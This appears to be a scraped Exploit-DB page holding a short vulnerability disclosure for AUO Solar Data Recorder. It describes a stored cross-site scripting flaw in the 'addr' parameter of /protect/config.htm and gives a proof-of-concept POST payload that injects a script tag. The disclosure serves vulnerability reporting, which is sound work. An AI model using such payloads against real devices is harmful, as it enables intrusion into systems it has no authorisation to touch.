edfd130ad1
11 changes to exploits/shellcodes BlueStacks 4.80.0.1060 - Denial of Service (PoC) RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC) RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC) TapinRadio 2.11.6 - 'Address' Denial of Service (PoC) TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC) Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting Carel pCOWeb < B1.2.1 - Cross-Site Scripting Carel pCOWeb < B1.2.1 - Credentials Disclosure Horde Webmail 5.2.22 - Multiple Vulnerabilities
17 lines
No EOL
784 B
Text
17 lines
No EOL
784 B
Text
# Exploit Title: AUO Solar Data Recorder - Stored XSS
|
|
# Date: 2019-04-16
|
|
# Exploit Author: Luca.Chiou
|
|
# Vendor Homepage: https://www.auo.com/zh-TW
|
|
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
|
|
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
|
|
|
|
# 1. Description:
|
|
# In AUO Solar Data Recorder web page,
|
|
# user can modify the system settings by access the /protect/config.htm.
|
|
# Attackers can inject malicious XSS code in parameter "addr" of post data.
|
|
# The value of addr will be stored in database, so that cause a stored XSS vulnerability.
|
|
|
|
# 2. Proof of Concept:
|
|
# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
|
|
# Send this post data:
|
|
addr= "<script>alert(123)</script>&dhcp=1 |